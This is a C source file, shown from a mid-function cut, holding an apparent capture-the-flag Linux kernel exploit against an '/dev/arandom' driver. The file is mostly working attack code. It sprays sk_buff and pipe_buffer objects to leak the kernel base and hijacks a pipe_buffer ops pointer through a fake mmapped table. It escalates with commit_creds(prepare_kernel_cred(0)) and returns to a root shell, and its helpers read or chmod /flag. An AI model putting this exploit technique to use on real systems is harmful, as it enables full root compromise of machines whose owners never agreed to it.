  memset(&bind_addr, 0, sizeof(bind_addr));
  bind_addr.sll_family = PF_PACKET;
  bind_addr.sll_protocol = htons(ETH_P_ALL);
  bind_addr.sll_ifindex = if_nametoindex("lo");
  bind_addr.sll_hatype = 0;
  bind_addr.sll_pkttype = 0;
  bind_addr.sll_halen = 0;

  if (bind(sock, (struct sockaddr *)&bind_addr, sizeof(bind_addr)) < 0) {
    puts("bind(AF_PACKET)");
    exit(-1);
  }

  return sock;
}
/*
 * Open a packet socket whose RX ring has `count` blocks of `size` bytes
 * each, using 2048-byte frames, no private area and a timeout value of 100.
 * Returns the descriptor produced by packet_socket_setup().
 */
int pagealloc_pad(int count, int size) {
  const unsigned int frame_bytes = 2048;
  const unsigned int private_bytes = 0;
  const int retire_timeout = 100;

  return packet_socket_setup(size, frame_bytes, count, private_bytes,
                             retire_timeout);
}

/*
 * Print `len` 64-bit words from `payload` to stdout, one per line, as
 * "<index>:\t<value in hex>".
 *
 * The index is a size_t so it is compared with `len` in the same type and
 * cannot overflow for large lengths. The words are only read.
 */
void hexdump(const uint64_t *payload, size_t len) {
  for (size_t i = 0; i < len; ++i) {
    printf("%zu:\t%#lx\n", i, (unsigned long)payload[i]);
  }
}

/* Pair of list links, each stored as a raw 64-bit value instead of a pointer. */
struct list_head {
uint64_t next; // forward link
uint64_t prev; // backward link
};

/*
* Message header layout as filled in by build_msg(): six 64-bit slots,
* 0x30 bytes in total.
* NOTE(review): presumably mirrors the header of the kernel's struct msg_msg;
* confirm against the target kernel before relying on the offsets.
*/
struct msg_msg {
struct list_head m_list; // list links (next, prev)
uint64_t m_type; // message type
uint64_t m_ts; // presumably the message text size -- TODO confirm
uint64_t next; // link to the next segment, stored as a raw value
uint64_t security; // security field, stored as a raw value
};

/*
* Header of a message continuation segment: a single 64-bit link.
* NOTE(review): presumably mirrors the kernel's struct msg_msgseg -- confirm.
*/
struct msg_msgseg {
uint64_t next; // link to the following segment, stored as a raw value
};

/*
struct msgbuf {
long mtype;
char mtext[0];
};
*/

/*
 * Create a new private System V message queue with mode 0666.
 * Returns whatever msgget() returns.
 */
int get_msg_queue(void) {
  int queue_id = msgget(IPC_PRIVATE, IPC_CREAT | 0666);

  return queue_id;
}

/*
 * Receive (and thereby remove) a message of type `msgtyp` from queue `msqid`
 * into `msgp`, using msgrcv() with no flags.
 * Returns the msgrcv() result converted to int.
 */
int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
  const int no_flags = 0;

  return msgrcv(msqid, msgp, msgsz, msgtyp, no_flags);
}

/**
 * Send one message on queue `msqid` with msgsnd() and no flags.
 *
 * `msgp` must point to a buffer laid out like `struct msgbuf`: the function
 * writes `msgtyp` into its mtype slot, and the `msgsz` payload bytes are
 * expected in msgbuf.mtext. Returns the msgsnd() result.
 */
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
  struct msgbuf *message = (struct msgbuf *)msgp;

  message->mtype = msgtyp;
  return msgsnd(msqid, message, msgsz, 0);
}

/*
 * Copy a message out of queue `msqid` without removing it.
 * With MSG_COPY, `msgtyp` is the position of the message on the queue
 * rather than a message type. The call does not block (IPC_NOWAIT) and
 * MSG_NOERROR is set as well. Returns the msgrcv() result converted to int.
 */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
  const int peek_flags = MSG_COPY | IPC_NOWAIT | MSG_NOERROR;

  return msgrcv(msqid, msgp, msgsz, msgtyp, peek_flags);
}

void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next,
uint64_t security) {
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}

/*
* Record the current cs and ss segment selectors, the stack pointer and the
* flags register in the globals user_cs, user_ss, user_sp and user_rflags.
* templine() later pushes these values to build its iretq frame.
*/
void save_stat() {
// rflags has no direct move form, so it is pushed and popped into operand 3.
asm volatile("movq %%cs, %0;"
"movq %%ss, %1;"
"movq %%rsp, %2;"
"pushfq;"
"popq %3;"
: "=r"(user_cs), "=r"(user_ss), "=r"(user_sp), "=r"(user_rflags)
:
: "memory");
}

/*
* Calls commit_creds(prepare_kernel_cred(0)) through the file-scope function
* pointers, then executes iretq on a hand-built frame.
*
* The frame is pushed in the order user_ss, user_sp, user_rflags, user_cs and
* the address of shell(), i.e. the values recorded by save_stat() with
* shell() as the return address. An extra 0 is pushed and popped into rbp
* around the swapgs instruction.
* NOTE(review): not referenced anywhere else in the visible file.
*/
void templine() {
commit_creds(prepare_kernel_cred(0));
asm("pushq %0;"
"pushq %1;"
"pushq %2;"
"pushq %3;"
"pushq $shell;"
"pushq $0;"
"swapgs;"
"popq %%rbp;"
"iretq;" ::"m"(user_ss),
"m"(user_sp), "m"(user_rflags), "m"(user_cs));
}
/*
 * Restrict the calling process to the single CPU `core` by building a CPU
 * mask with only that bit set and passing it to sched_setaffinity().
 * The result of sched_setaffinity() is not checked.
 */
void bind_cpu(int core) {
  cpu_set_t only_core;

  CPU_ZERO(&only_core);
  CPU_SET(core, &only_core);
  sched_setaffinity(getpid(), sizeof(only_core), &only_core);
}

/*
 * Write the string `text` to the existing file `path`.
 * Returns 0 when the whole string was written, -1 otherwise; failures are
 * reported with perror() and are not fatal.
 */
static int write_text_file(const char *path, const char *text) {
  const size_t wanted = strlen(text);
  int file = open(path, O_WRONLY);
  if (file < 0) {
    perror(path);
    return -1;
  }

  ssize_t written = write(file, text, wanted);
  if (written < 0 || (size_t)written != wanted) {
    perror(path);
    close(file);
    return -1;
  }

  close(file);
  return 0;
}

/*
 * Move the process into new mount, user and network namespaces and map
 * uid 0 / gid 0 inside the new user namespace to the caller's original
 * uid / gid.
 *
 * The original IDs are read BEFORE unshare(): once the process is in a user
 * namespace without a mapping, getuid()/getgid() return the overflow ID
 * instead of the real one, so reading them afterwards produces a map line
 * for the wrong outer ID.
 *
 * A failing unshare() is reported through err_exit(). Writing the
 * setgroups / uid_map / gid_map files stays best effort: a failure is
 * reported on stderr and execution continues.
 */
void unshare_setup(void) {
  char edit[0x100];
  const uid_t outer_uid = getuid();
  const gid_t outer_gid = getgid();

  if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET))
    err_exit("FAILED to create a new namespace");

  /* gid_map may only be written by an unprivileged process after
   * setgroups has been set to "deny". */
  (void)write_text_file("/proc/self/setgroups", "deny");

  snprintf(edit, sizeof(edit), "0 %u 1", (unsigned int)outer_uid);
  (void)write_text_file("/proc/self/uid_map", edit);

  snprintf(edit, sizeof(edit), "0 %u 1", (unsigned int)outer_gid);
  (void)write_text_file("/proc/self/gid_map", edit);
}

/*
* Issue system call number 1 with rdi = fd, rsi = buffer and rdx = 0x20
* (on x86-64 Linux this is write(fd, buffer, 0x20)) after loading fixed
* marker constants into r15, r14, r13, r12, r11, r10, r9, r8 and rcx.
*
* NOTE(review): the asm statement declares no clobbers although it
* overwrites all of those registers plus rdi, rsi, rdx and rax, and the
* compiler may place the "r" inputs in a register that is overwritten before
* it is read. Treat the surrounding register state as undefined.
*/
void __always_inline pt_reg(int fd, char *buffer) {
__asm__ __volatile__("movq $0xbeefdead, %%r15;"
"movq $0x11111111, %%r14;" // 0x78
"movq $0x22222222, %%r13;"
"movq $0x33333333, %%r12;"
"movq $0x66666666, %%r11;"
"movq $0x77777777, %%r10;"
"movq $0x88888888, %%r9;"
"movq $0x99999999, %%r8;"
"movq $0xaaaaaaaa, %%rcx;"
"xorq %%rdi, %%rdi;"
"movl %0, %%edi;"
"movq %1, %%rsi;"
"movq $0x20, %%rdx;"
"movq $1, %%rax;"
"syscall;" ::"r"(fd),
"r"(buffer));
}

/*
 * Read the first 0x100 bytes of /sys/kernel/notes, take the 64-bit value
 * stored at byte offset 0x9c, subtract 0x2000 and return the result.
 *
 * The value is extracted with memcpy() because offset 0x9c is not 8-byte
 * aligned and the buffer is a char array. The descriptor is closed before
 * returning. If the file cannot be opened, or fewer than 0x9c + 8 bytes
 * can be read, the problem is reported on stderr and the process exits
 * with -1 instead of returning a value computed from missing data.
 */
uint64_t leak_from_notes() {
  enum { NOTE_VALUE_OFFSET = 0x9c };
  char leak[0x100] = {0};
  uint64_t note_value = 0;

  int fd_leak = open("/sys/kernel/notes", O_RDONLY);
  if (fd_leak < 0) {
    perror("open(/sys/kernel/notes)");
    exit(-1);
  }

  ssize_t got = read(fd_leak, leak, sizeof(leak));
  close(fd_leak);
  if (got < 0) {
    perror("read(/sys/kernel/notes)");
    exit(-1);
  }
  if ((size_t)got < NOTE_VALUE_OFFSET + sizeof(note_value)) {
    fputs("read(/sys/kernel/notes): short read\n", stderr);
    exit(-1);
  }

  memcpy(&note_value, &leak[NOTE_VALUE_OFFSET], sizeof(note_value));
  uint64_t base = note_value - 0x2000;
  success("leaking address: %#lx", base);
  return base;
}

/*
 * Run a fixed sequence of shell commands: create the script /tmp/x (which
 * chmods /flag to 777), create /tmp/dummy containing four 0xff bytes, make
 * both executable and try to execute /tmp/dummy. After a 3000 microsecond
 * pause, print /flag, then wait for a signal and exit with status 0.
 */
void get_flag() {
  static const char *const setup_cmds[] = {
      "echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/x",
      "chmod +x /tmp/x",
      "echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy",
      "chmod +x /tmp/dummy",
      "/tmp/dummy",
  };
  const size_t cmd_count = sizeof(setup_cmds) / sizeof(setup_cmds[0]);

  for (size_t idx = 0; idx < cmd_count; ++idx) {
    system(setup_cmds[idx]);
  }

  usleep(3000);
  system("cat /flag");
  pause();
  exit(0);
}

/*
 * Try to execve() /tmp/dummy with NULL argv and envp. If that call returns,
 * open /flag read-write, read up to 0x50 bytes into a zeroed buffer and
 * write all 0x50 buffer bytes to stdout. Then wait for a signal and exit
 * with status 0. None of the system call results are checked.
 */
void get_flag2() {
  char flag_text[0x50] = {0};

  execve("/tmp/dummy", NULL, NULL);

  int flag_fd = open("/flag", O_RDWR);
  read(flag_fd, flag_text, sizeof(flag_text));
  write(STDOUT_FILENO, flag_text, sizeof(flag_text));

  pause();
  exit(0);
}

/*
 * Close both ends of a pipe: first flides[0], then flides[1].
 * The close() results are not checked.
 */
void free_pipe(int flides[2]) {
  for (int end = 0; end < 2; ++end) {
    close(flides[end]);
  }
}

/*
* Constructor, run automatically before main(): binds the process to CPU 0
* via bind_cpu() and stores the system page size in the global page_size.
*/
void __attribute__((constructor)) init() {
bind_cpu(0);
page_size = sysconf(_SC_PAGESIZE);
}

// Three 32-bit parameters of the arandom driver (12 bytes in total).
// main() fills the global instance AAA by passing its address to
// ioctl 0x1004. The XREF notes are kept from the decompiler output.
struct arandom_params // sizeof=0xC
{ // XREF: random_info/r
uint32_t rand_size; // allocation size used by the driver; XREF: arandom_ioctl+BF/r
uint32_t rand_offset; // byte offset inside the driver buffer that ioctl 0x1003 writes to
uint32_t rand_value; // 32-bit value that ioctl 0x1003 writes
} AAA;

/*
 * Raise the open-file limit (RLIMIT_NOFILE).
 *
 * Soft and hard limit are both set to 14096; if that is refused, 4096 is
 * tried instead. If both attempts fail, the error is printed with perror()
 * and reported through err_exit().
 */
static void adjust_rlimit() {
  static const rlim_t nofile_candidates[] = {14096, 4096};
  const size_t candidate_count =
      sizeof(nofile_candidates) / sizeof(nofile_candidates[0]);

  for (size_t idx = 0; idx < candidate_count; ++idx) {
    struct rlimit wanted;

    wanted.rlim_cur = nofile_candidates[idx];
    wanted.rlim_max = nofile_candidates[idx];
    if (setrlimit(RLIMIT_NOFILE, &wanted) >= 0) {
      return;
    }
  }

  perror("setrlimit");
  err_exit("setrlimit");
}

/*
* Create PRE_MSG_NUM message queues, send one 0x1000 - 0x30 byte message of
* type 1 to each, then receive (and thereby free) a subset of them again.
*
* NOTE(review): not called from main() in the visible file, and both
* malloc()ed buffers are never freed or checked for NULL.
*/
void pre_spray() {
#define PRE_MSG_NUM 56
int pre_ms_qid[PRE_MSG_NUM];
char *pre_msg_buf = (char *)malloc(0x1000);
char *pre_msg_recv = (char *)malloc(0x1000);

// One message per queue; the payload of message i is filled with (char)i.
for (int i = 0; i < PRE_MSG_NUM; ++i) {
pre_ms_qid[i] = get_msg_queue();
memset(pre_msg_buf, (char)i, 0x1000);
check(write_msg(pre_ms_qid[i], pre_msg_buf, 0x1000 - 0x30, 1));
}
success("pre spray msg_msg successfully\n");

// Receive the message of every 8th queue: indices 0, 8, ..., 40.
for (int i = 0; i < PRE_MSG_NUM - 8; i += 8) {
check(read_msg(pre_ms_qid[i], pre_msg_recv, 0x1000 - 0x30, 1));
}
info("free some objs\n");

// Receive the messages of the last queues, indices 49..55.
// NOTE(review): that is 7 messages, while the log line below says 8;
// index 48 is left untouched. Confirm which one is intended.
for (int i = PRE_MSG_NUM - 7; i < PRE_MSG_NUM; ++i) {
check(read_msg(pre_ms_qid[i], pre_msg_recv, 0x1000 - 0x30, 1));
}
info("free before 8 objs\n");
}

/*
* Create 0x100 pipes; for each one write a page of data, resize the pipe
* with F_SETPIPE_SZ to 0x1000 * 64 bytes, and write another 0x1000 bytes.
*
* NOTE(review): not called from main() in the visible file. pipe_buf is
* never freed and the descriptors in pipe_fd are lost when the function
* returns.
*/
void spray_pipe() {
const uint64_t pipe_num = 0x100;
const uint64_t pipe_buf_size = page_size;

char *pipe_buf = malloc(pipe_buf_size);
// Variable-length array: pipe_num is a const object, not a constant expression.
int pipe_fd[pipe_num][2];
// anon_pipe_buf_ops
for (int i = 0; i < pipe_num; ++i) {
check(pipe(pipe_fd[i]));
// Payload: byte value i, with the marker "find__me" in the first 8 bytes.
memset(pipe_buf, i, pipe_buf_size);
memcpy(pipe_buf, "find__me", 0x8);
for (int j = 0; j < 0x1; ++j) {
check(write(pipe_fd[i][1], pipe_buf, pipe_buf_size));
}
check(fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 64));
check(write(pipe_fd[i][1], pipe_buf, 0x1000));
}
}

/*
* Open /proc/self/stat 0xc00 times, then issue the driver's write ioctl
* (0x1003) on the global device descriptor fd and log the offset and value
* taken from AAA.
*
* NOTE(review): not called from main() in the visible file. The opened
* descriptors are never closed.
*/
void spray_seq() {
const uint64_t seq_file_num = 0xc00;

// Variable-length array holding one descriptor per open().
int seq_fd[seq_file_num];

for (int i = 0; i < seq_file_num; ++i) {
seq_fd[i] = check(open("/proc/self/stat", 0));
}
success("spray seq_op successfully\n");

check(ioctl(fd, 0x1003)); // write
info("write buffer+%#x <- %#x\n", AAA.rand_offset, AAA.rand_value);
}

// NOTE: Linux v6.11 add msg_msg-xx kmalloc cache and only affects the first
// page, which means we can't use it to perform heap spray :(
// Pwned :)
// Success rate: approximately 1/40
/*
* Program entry point. Runs the steps below in order, each announced through
* step():
*   0x01 open /dev/arandom, fetch AAA, then allocate and free the driver buffer
*   0x02 send data over AF_UNIX socket pairs, with the three AAA values placed
*        at the page offset of rand_offset
*   0x03 issue ioctl 0x1005 and read the data back, looking for a 64-bit value
*        whose upper 32 bits are all ones
*   0x04 create pipes and resize them
*   0x05 issue ioctl 0x1003 and mirror the same 4-byte write into a local
*        pipe_buffer model to predict the resulting `ops` value
*   0x06 map memory at that predicted address, fill it with the address of
*        win(), close the pipes and call shell()
*/
int main() {
// Driver ioctl commands, as noted from the decompiled arandom_ioctl:
// 0x1001: alloc    0x1002: free
// 0x1003:
//   *(_DWORD *)((char *)buffer + rand_offset) = AAA.rand_value;
// 0x1004:
//   copy_to_user AAA
// 0x1005:
//   if ( *(_QWORD *)((char *)buffer + v4) == AAA.rand_value
//     && v4 == *(_QWORD *)((char *)buffer + v4 + 16)
//     && *(_QWORD *)((char *)buffer + v4 + 24) == AAA.rand_size )
//   {
//     *(_QWORD *)((char *)buffer + v4 + 32) = &get_random_bytes;
//   }
//

save_stat();
adjust_rlimit();

info("page size: %#lx\n", page_size);

// INFO: Step 0x01: open device
step("open device");

fd = check(open("/dev/arandom", 2));
success("device open successfully\n");

// NOTE(review): the results of the 0x1004 and 0x1001 ioctls are not checked.
ioctl(fd, 0x1004, &AAA);
info("arandom rand_size: %#x\n", AAA.rand_size);
info("arandom rand_offset: %#x\n", AAA.rand_offset);
info("arandom rand_value: %#x\n", AAA.rand_value);

ioctl(fd, 0x1001); // alloc
info("alloc buffer size: %#x\n", AAA.rand_size);

check(ioctl(fd, 0x1002)); // free
info("free buffer successfully\n");

// Offset of rand_offset within a 0x1000-byte page.
uint32_t offset = AAA.rand_offset & 0xfff;
info("page offset: %#x\n", offset);

// INFO: Step 0x02: spray sk_buff
step("spray sk_buff");
#define SOCKET_NUM 8
#define SK_BUFF_NUM 10
// Each write sends page_size - 320 bytes.
// NOTE(review): 320 is presumably the per-skb overhead that keeps the data
// allocation within 0x1000 bytes -- confirm against the target kernel.
const uint64_t skb_reserve_size = 320;
const uint64_t skb_size = page_size - skb_reserve_size;

int sk_sockets[SOCKET_NUM][2];
char *skb_buf = (char *)malloc(0x1000);

for (int i = 0; i < SOCKET_NUM; i++) {
check(socketpair(AF_UNIX, SOCK_STREAM, 0, sk_sockets[i]));
memset(skb_buf, (char)i, skb_size);
memcpy(skb_buf, "hamoood", 0x8);
// Lay out the values ioctl 0x1005 compares: rand_value at +0, rand_offset
// at +0x10 and rand_size at +0x18, each zero-extended to 64 bits.
// NOTE(review): offset can be as large as 0xfff while skb_buf is 0x1000
// bytes and only skb_size bytes are sent, so for large offsets these
// accesses run past the buffer and past the transmitted data.
memset(skb_buf + offset, 0, 0x20);
memcpy(skb_buf + offset, &AAA.rand_value, 0x4);
memcpy(skb_buf + offset + 0x10, &AAA.rand_offset, 0x4);
memcpy(skb_buf + offset + 0x18, &AAA.rand_size, 0x4);

for (int j = 0; j < SK_BUFF_NUM; ++j) {
check(write(sk_sockets[i][0], skb_buf, skb_size));
}
}
success("spray sk_buff successfully\n");

// INFO: Step 0x03: check & read sk_buff
step("check & read sk_buff");
char *skb_recv = (char *)malloc(0x1000);

check(ioctl(fd, 0x1005)); // check
info("check buffer\n");

info("read sk_buff length %#x\n", offset);

for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; ++j) {
check(read(sk_sockets[i][1], skb_recv, skb_size));

// ioctl 0x1005 stores &get_random_bytes at +0x20 when its comparison
// succeeds; a value with all upper 32 bits set is taken as that pointer.
uint64_t possible_addr = *(uint64_t *)(skb_recv + offset + 0x20);
if ((possible_addr & 0xffffffff00000000) == 0xffffffff00000000) {
success("find kernel addr at No.%d: %#lx\n", i,
*(uint64_t *)(skb_recv + offset + 0x20));
// kernel_base is still 0 here, so calc() returns the plain offset of
// 0xffffffff81907850 from 0xffffffff81000000.
kernel_base = possible_addr - calc(0xffffffff81907850);
success("find kernel base: %#lx\n", kernel_base);
goto FIND;
}
}
}
if (kernel_base == 0) {
err_exit("not found");
}

FIND:
// INFO: Step 0x04: spray pipe_buffer
step("spray pipe_buffer");

// Local model of one pipe_buffer entry (0x28 bytes on LP64), used only to
// predict the effect of the 4-byte write issued in step 0x05.
struct pipe_buffer {
void *page;
unsigned int offset, len;
void *ops;
unsigned int flags;
unsigned long private;
} pipe_example;

pipe_example.page = (void *)0xffffea0000000000;
pipe_example.len = 0x1000;
pipe_example.offset = 0x0;
pipe_example.ops = (void *)calc(0xffffffff8222bb80);
// The assignment above is immediately overridden: the model starts with
// ops == NULL.
pipe_example.ops = NULL;
pipe_example.flags = 0x10;
pipe_example.private = 0x0;

const size_t pipe_buffer_size = sizeof(struct pipe_buffer);

info("pipe_buffer size: %#lx\n", pipe_buffer_size);

const uint64_t pipe_num = 0x10;
const uint64_t pipe_buf_size = page_size;

// Position of the write inside one entry, treating the page as an array of
// pipe_buffer_size-byte entries starting at offset 0.
uint32_t inner_pipe_offset = offset % pipe_buffer_size;

char *pipe_buf = malloc(pipe_buf_size);
// Variable-length array: pipe_num is a const object, not a constant expression.
int pipe_fd[pipe_num][2];
// anon_pipe_buf_ops
for (int i = 0; i < pipe_num; ++i) {
check(pipe(pipe_fd[i]));
memset(pipe_buf, i, pipe_buf_size);
memcpy(pipe_buf, "find__me", 0x8);
check(write(pipe_fd[i][1], pipe_buf, pipe_buf_size));
check(fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 64));

for (int j = 0; j < 0x1; ++j) {
memset(pipe_buf + 0x8, j, 0x8);
check(write(pipe_fd[i][1], pipe_buf, 0x1000));
}
}
success("spray pipe_buffer successfully\n");

// INFO: Step 0x05: write random value
step("write random value");

info("inner pipe offset: %#x\n", inner_pipe_offset);
info("before writting:\n");
dump_hex((char *)&pipe_example, 0x28);

// Apply the same 4-byte write to the local model.
// NOTE(review): inner_pipe_offset can be up to 0x27, so a 4-byte copy at
// offsets above 0x24 runs past the end of pipe_example.
memcpy((char *)(&pipe_example) + inner_pipe_offset, &AAA.rand_value, 0x4);

check(ioctl(fd, 0x1003)); // write
info("write buffer+%#x <- %#x\n", AAA.rand_offset, AAA.rand_value);

info("after writting:\n");
dump_hex((char *)&pipe_example, 0x28);

// Split the predicted ops value into its page address and in-page offset.
void *fake_ops = pipe_example.ops;
void *fake_ops_page = (void *)((uint64_t)fake_ops & 0xFFFFFFFFFffff000);
// NOTE(review): fake_ops_page_offset is computed but not used below.
uint32_t fake_ops_page_offset = ((uint64_t)fake_ops & 0xfff);

// ops still NULL means the write did not touch the ops field of the model.
if (pipe_example.ops == NULL) {
err_exit("Useless write");
}

success("affect pipe_buffer's ops successfully\n");
success("pipe_buffer's ops: %p\n", pipe_example.ops);

info("mmap page %p\n", fake_ops_page);
// Request 0x3000 bytes of anonymous memory at the predicted page address;
// without MAP_FIXED the kernel may choose another address, which is
// treated as an error below.
void *mmap_page = mmap(fake_ops_page, 0x3000, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (mmap_page != fake_ops_page) {
err_exit("mmap error");
}

// INFO: Step 0x06: close pipes
step("close pipes");

// ffffffff812c8d40 T commit_creds
// ffffffff812c8fd0 T prepare_kernel_cred
commit_creds = (void *)calc(0xffffffff812c8d40);
prepare_kernel_cred = (void *)calc(0xffffffff812c8fd0);
init_cred = (void *)calc(0xffffffff82a54120);

uint64_t win_addr = (uint64_t)win;
info("win address: %#lx\n", win_addr);

// Fill 0x80 consecutive 8-byte slots starting at fake_ops with the address
// of win(). (Arithmetic on void * is a GNU C extension.)
for (int i = 0; i < 0x80; ++i) {
memcpy(fake_ops + i * 8, &win_addr, 0x8);
}

for (int i = 0; i < pipe_num; ++i) {
check(close(pipe_fd[i][0]));
check(close(pipe_fd[i][1]));
}

shell();

/*
* Debugger note kept from development: the call site in load_msg and the
* register values observed there.
*
0xffffffff8170540b <load_msg+59> call 0xffffffff81501210
<__kmalloc_node_noprof>
rdi: 0xa00
rsi: 0xffff8880044512a0 <- 0
rdx: 0xcc0
rcx: 0xffffffff
*
*/

return 0;
}